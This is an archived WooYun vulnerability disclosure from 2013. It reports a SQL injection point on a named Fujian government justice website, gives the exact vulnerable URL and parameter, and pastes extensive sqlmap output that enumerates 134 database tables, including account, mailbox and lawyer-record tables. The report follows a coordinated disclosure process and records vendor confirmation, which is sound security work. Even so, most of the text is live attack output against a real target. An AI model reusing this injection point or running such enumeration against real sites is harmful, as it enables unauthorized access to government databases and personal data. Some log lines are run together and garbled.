乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2013-10-10: 细节已通知厂商并且等待厂商处理中 2013-10-14: 厂商已经确认,细节仅向厂商公开 2013-10-24: 细节向核心白帽子及相关领域专家公开 2013-11-03: 细节向普通白帽子公开 2013-11-13: 细节向实习白帽子公开 2013-11-24: 细节向公众公开
.....
注射点:http://www.fjsf.gov.cn/fjsf/templates/xxgk/default_xxgkContent.jsp?modelId=85&atcId=65896
back-end DBMS: Microsoft SQL Server 2000[07:58:15] [INFO] fetching tables for database 'fjsf'[07:58:15] [INFO] fetching number of tables for database 'fjsf'[07:58:15] [INFO] retrieved: 134[07:58:26] [INFO] retrieved: dbo.abc[07:59:25] [INFO] retrieved: dbo.application[08:00:43] [INFO] retrieved: dbo.cert_lawyer[08:02:32] [INFO] retrieved: dbo.cert_member[08:03:47] [INFO] retrieved: dbo.cert_record[08:04:43] [INFO] retrieved: dbo.company[08:06:05] [INFO] retrieved: dbo.D99_CMD[08:07:11] [INFO] retrieved: dbo.D99_Tmp[08:08:14] [INFO] retrieved: dbo.dtprop[08:10:04] [CRITICAL] connection timed out to the target url or proxy, sqlmap is going to retry the requeste[08:10:51] [CRITICAL] connection timed out to the target url or proxy, sqlmap is going to retry the requestrties[08:11:38] [INFO] retrieved: dbo.gip_appraisal_organ[08:14:01] [INFO] retrieved: dbo.gip_appraisal_organ_changling[08:15:40] [INFO] retrieved: dbo.gip_appraisal_organ_hortation[08:17:17] [INFO] retrieved: dbo.gip_appraisal_organ_punish[08:18:28] [INFO] retrieved: dbo.gip_appraiser[08:18:59] [INFO] retrieved: dbo.gip_appraiser_20121107[08:20:17] [INFO] retrieved: dbo.gip_appraiser_20121113[08:21:03] [INFO] retrieved: dbo.gip_appraiser_chasten[08:21:59] [INFO] retrieved: dbo.gip_appraiser_hortation[08:23:14] [INFO] retrieved: dbo.gip_appraiser_suffer[08:24:18] [INFO] retrieved: dbo.gip_appraiser3[08:24:45] [INFO] retrieved: dbo.gip_banner[08:25:49] [INFO] retrieved: dbo.gip_code[08:27:11] [INFO] retrieved: dbo.gip_data[08:27:51] [INFO] retrieved: dbo.gip_dict[08:28:25] [INFO] retrieved: dbo.gip_exam_counts[08:30:14] [INFO] retrieved: dbo.gip_exam_standby[08:31:33] [INFO] retrieved: dbo.gip_exam_zgcx[08:32:19] [INFO] retrieved: dbo.gip_flfw[08:33:24] [INFO] retrieved: dbo.gip_flfw_fws[08:34:38] [INFO] retrieved: dbo.gip_flfw_fws_bak[08:35:43] [INFO] retrieved: dbo.gip_flfw_fws_hortation[08:37:39] [INFO] retrieved: dbo.gip_flfw_fws_punishment[08:39:54] [INFO] retrieved: dbo.gip_flfw_publish_fws_yearCheckResult[08:43:52] [INFO] retrieved: dbo.gip_flyz_organ[08:45:42] [INFO] retrieved: dbo.gip_greffier_member[08:47:58] [INFO] retrieved: dbo.gip_greffier_member_cha[08:49:49] [CRITICAL] connection timed out to the target url or proxy, sqlmap is going to retry the requeststen[08:50:22] [INFO] retrieved: dbo.gip_greffier_member_enrollment[08:52:55] [INFO] retrieved: dbo.gip_greffier_member_hortation[08:55:13] [INFO] retrieved: dbo.gip_greffier_member_narrate[08:56:53] [INFO] retrieved: dbo.gip_greffier_member_suffer[08:58:30] [INFO] retrieved: dbo.gip_greffier_office[08:59:37] [INFO] retrieved: dbo.gip_greffier_office_changling[09:01:47] [INFO] retrieved: dbo.gip_greffier_office_crics[09:03:07] [INFO] retrieved: dbo.gip_greffier_office_hortation[09:05:57] [INFO] retrieved: dbo.gip_greffier_office_[09:07:49] [CRITICAL] connection timed out to the target url or proxy, sqlmap is going to retry the requestp[09:08:44] [CRITICAL] connection timed out to the target url or proxy, sqlmap is going to retry the requestunish[09:10:41] [INFO] retrieved: dbo.gip_law_member_chasten[09:16:51] [INFO] retrieved: dbo.gip_law_member_enrollment[09:22:01] [INFO] retrieved: dbo.gip_law_member_hortation[09:25:28] [INFO] retrieved: dbo.gip_law_member_lawer[09:27:32] [INFO] retrieved: dbo.gip_law_member_lawer_back[09:29:55] [INFO] retrieved: dbo.gip_law_member_lawer2[09:30:55] [INFO] retrieved: dbo.gip_law_member_narrate[09:32:46] [INFO] retrieved: dbo.gip_law_member_suffer[09:34:11] [INFO] retrieved: dbo.gip_law_office[09:35:10] [INFO] retrieved: dbo.gip_law_office_chan[09:36:43] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the requestg[09:37:17] [CRITICAL] connection timed out to the target url or proxy, sqlmap is going to retry the requestling[09:38:03] [INFO] retrieved: dbo.gip_law_office_crics[09:39:17] [INFO] retrieved: dbo.gip_law_office_hortation[09:41:27] [INFO] retrieved: dbo.gip_law_office_punish[09:42:52] [INFO] retrieved: dbo.gip_primary_office[09:45:57] [INFO] retrieved: dbo.gip_primary_office_crics[09:47:43] [INFO] retrieved: dbo.gip_primary_office_hortation[09:49:49] [INFO] retrieved: dbo.gip_primary_office_punish[09:51:49] [INFO] retrieved: dbo.info_month_num[09:54:57] [INFO] retrieved: dbo.jc_count_num[09:58:00] [INFO] retrieved: dbo.jc_count_num1[09:59:10] [INFO] retrieved: dbo.jc_xxgk_gkgd[10:01:25] [INFO] retrieved: dbo.jc_xxgk_ml[10:02:46] [INFO] retrieved: dbo.jc_xxgk_ndbg[10:04:07] [INFO] retrieved: dbo.jc_xxgk_sqgk[10:05:37] [INFO] retrieved: dbo.jc_xxgk_yjx[10:06:54] [INFO] retrieved: dbo.jc_xxgk_zn[10:07:47] [INFO] retrieved: dbo.old_data[10:09:07] [INFO] retrieved: dbo.sheet1$[10:10:19] [INFO] retrieved: dbo.sysconstraints[10:12:40] [INFO] retrieved: dbo.syssegments[10:14:10] [INFO] retrieved: dbo.system_log[10:15:24] [INFO] retrieved: dbo.t_area_one[10:17:19] [INFO] retrieved: dbo.t_history_record[10:20:08] [INFO] retrieved: dbo.T_Inter_View[10:22:15] [INFO] retrieved: dbo.T_Inter_voice[10:23:33] [INFO] retrieved: dbo.t_population_count[10:26:51] [INFO] retrieved: dbo.t_Public_Message[10:29:42] [INFO] retrieved: dbo.t_Public_MessReply[10:30:59] [INFO] retrieved: dbo.t_Public_opinion[10:32:45] [INFO] retrieved: dbo.t_question[10:34:16] [INFO] retrieved: dbo.t_questions[10:34:57] [INFO] retrieved: dbo.t_questions_category[10:36:50] [INFO] retrieved: dbo.t_synCounter[10:38:42] [INFO] retrieved: dbo.t_sys_account[10:40:29] [INFO] retrieved: dbo.t_sys_account_part[10:41:41] [INFO] retrieved: dbo.t_sys_articleScope[10:43:44] [INFO] retrieved: dbo.t_sys_browse_count[10:46:04] [INFO] retrieved: dbo.t_sys_business[10:47:55] [INFO] retrieved: dbo.t_sys_comment[10:49:36] [INFO] retrieved: dbo.t_sys_content[10:51:00] [INFO] retrieved: dbo.t_sys_content_fjipo[10:52:29] [INFO] retrieved: dbo.t_sys_content_recycle[10:54:17] [INFO] retrieved: dbo.t_sys_dep[10:55:25] [INFO] retrieved: dbo.t_sys_groups[10:57:03] [INFO] retrieved: dbo.t_sys_ip[10:57:58] [INFO] retrieved: dbo.t_sys_mail[10:59:38] [INFO] retrieved: dbo.t_sys_mailbox[11:00:57] [INFO] retrieved: dbo.t_sys_mailbox_content[11:03:28] [INFO] retrieved: dbo.t_sys_mailbox_question[11:05:56] [INFO] retrieved: dbo.t_sys_model[11:07:15] [INFO] retrieved: dbo.t_sys_modelclick[11:08:39] [INFO] retrieved: dbo.t_sys_modelGroup[11:10:09] [INFO] retrieved: dbo.t_sys_modeltype[11:11:35] [INFO] retrieved: dbo.t_sys_motif[11:12:38] [INFO] retrieved: dbo.t_sys_option[11:13:59] [INFO] retrieved: dbo.t_sys_part[11:15:11] [INFO] retrieved: dbo.t_sys_questionType[11:18:02] [INFO] retrieved: dbo.t_sys_report[11:19:42] [INFO] retrieved: dbo.t_sys_scope[11:21:07] [INFO] retrieved: dbo.t_sys_select[11:22:35] [INFO] retrieved: dbo.t_sys_sort[11:23:33] [INFO] retrieved: dbo.t_sys_template[11:25:31] [INFO] retrieved: dbo.t_sys_templatetype[11:27:25] [INFO] retrieved: dbo.t_sys_text[11:28:23] [INFO] retrieved: dbo.t_sys_title[11:29:45] [INFO] retrieved: dbo.t_sys_viewcount[11:31:54] [INFO] retrieved: dbo.t_theme_collect[11:34:41] [INFO] retrieved: dbo.T_WSSP[11:35:57] [INFO] retrieved: dbo.test[11:37:00] [INFO] retrieved: dbo.UserInfo[11:39:03] [INFO] retrieved: dbo.VisitDetail[11:41:33] [INFO] retrieved: dbo.WCRTEMP00139[11:44:09] [INFO] retrieved: dbo.WCRTEMP00140[11:45:02] [INFO] retrieved: dbo.zxft_context[11:47:43] [INFO] retrieved: dbo.zxft_images[11:49:16] [INFO] retrieved: dbo.zxft_nextTheme[11:51:26] [INFO] retrieved: dbo.zxft_recentTheme[11:53:36] [INFO] retrieved: dbo.zxft_theme[11:54:48] [INFO] retrieved: dbo.??Database: fjsf[134 tables]+------------------------------------------+| dbo. || dbo.D99_CMD || dbo.D99_Tmp || dbo.T_Inter_View || dbo.T_Inter_voice || dbo.T_WSSP || dbo.UserInfo || dbo.VisitDetail || dbo.WCRTEMP00139 || dbo.WCRTEMP00140 || dbo.abc || dbo.application || dbo.cert_lawyer || dbo.cert_member || dbo.cert_record || dbo.company || dbo.dtproperties || dbo.gip_appraisal_organ || dbo.gip_appraisal_organ_changling || dbo.gip_appraisal_organ_hortation || dbo.gip_appraisal_organ_punish || dbo.gip_appraiser || dbo.gip_appraiser3 || dbo.gip_appraiser_20121107 || dbo.gip_appraiser_20121113 || dbo.gip_appraiser_chasten || dbo.gip_appraiser_hortation || dbo.gip_appraiser_suffer || dbo.gip_banner || dbo.gip_code || dbo.gip_data || dbo.gip_dict || dbo.gip_exam_counts || dbo.gip_exam_standby || dbo.gip_exam_zgcx || dbo.gip_flfw || dbo.gip_flfw_fws || dbo.gip_flfw_fws_bak || dbo.gip_flfw_fws_hortation || dbo.gip_flfw_fws_punishment || dbo.gip_flfw_publish_fws_yearCheckResult || dbo.gip_flyz_organ || dbo.gip_greffier_member || dbo.gip_greffier_member_chasten || dbo.gip_greffier_member_enrollment || dbo.gip_greffier_member_hortation || dbo.gip_greffier_member_narrate || dbo.gip_greffier_member_suffer || dbo.gip_greffier_office || dbo.gip_greffier_office_changling || dbo.gip_greffier_office_crics || dbo.gip_greffier_office_hortation || dbo.gip_greffier_office_punish || dbo.gip_law_member_chasten || dbo.gip_law_member_enrollment || dbo.gip_law_member_hortation || dbo.gip_law_member_lawer || dbo.gip_law_member_lawer2 || dbo.gip_law_member_lawer_back || dbo.gip_law_member_narrate || dbo.gip_law_member_suffer || dbo.gip_law_office || dbo.gip_law_office_changling || dbo.gip_law_office_crics || dbo.gip_law_office_hortation || dbo.gip_law_office_punish || dbo.gip_primary_office || dbo.gip_primary_office_crics || dbo.gip_primary_office_hortation || dbo.gip_primary_office_punish || dbo.info_month_num || dbo.jc_count_num || dbo.jc_count_num1 || dbo.jc_xxgk_gkgd || dbo.jc_xxgk_ml || dbo.jc_xxgk_ndbg || dbo.jc_xxgk_sqgk || dbo.jc_xxgk_yjx || dbo.jc_xxgk_zn || dbo.old_data || dbo.sheet1$ || dbo.sysconstraints || dbo.syssegments || dbo.system_log || dbo.t_Public_MessReply || dbo.t_Public_Message || dbo.t_Public_opinion || dbo.t_area_one || dbo.t_history_record || dbo.t_population_count || dbo.t_question || dbo.t_questions || dbo.t_questions_category || dbo.t_synCounter || dbo.t_sys_account || dbo.t_sys_account_part || dbo.t_sys_articleScope || dbo.t_sys_browse_count || dbo.t_sys_business || dbo.t_sys_comment || dbo.t_sys_content || dbo.t_sys_content_fjipo || dbo.t_sys_content_recycle || dbo.t_sys_dep || dbo.t_sys_groups || dbo.t_sys_ip || dbo.t_sys_mail || dbo.t_sys_mailbox || dbo.t_sys_mailbox_content || dbo.t_sys_mailbox_question || dbo.t_sys_model || dbo.t_sys_modelGroup || dbo.t_sys_modelclick || dbo.t_sys_modeltype || dbo.t_sys_motif || dbo.t_sys_option || dbo.t_sys_part || dbo.t_sys_questionType || dbo.t_sys_report || dbo.t_sys_scope || dbo.t_sys_select || dbo.t_sys_sort || dbo.t_sys_template || dbo.t_sys_templatetype || dbo.t_sys_text || dbo.t_sys_title || dbo.t_sys_viewcount || dbo.t_theme_collect || dbo.test || dbo.zxft_context || dbo.zxft_images || dbo.zxft_nextTheme || dbo.zxft_recentTheme || dbo.zxft_theme |+------------------------------------------+C:\Python27>h
................
危害等级:高
漏洞Rank:11
确认时间:2013-10-14 23:24
暂无
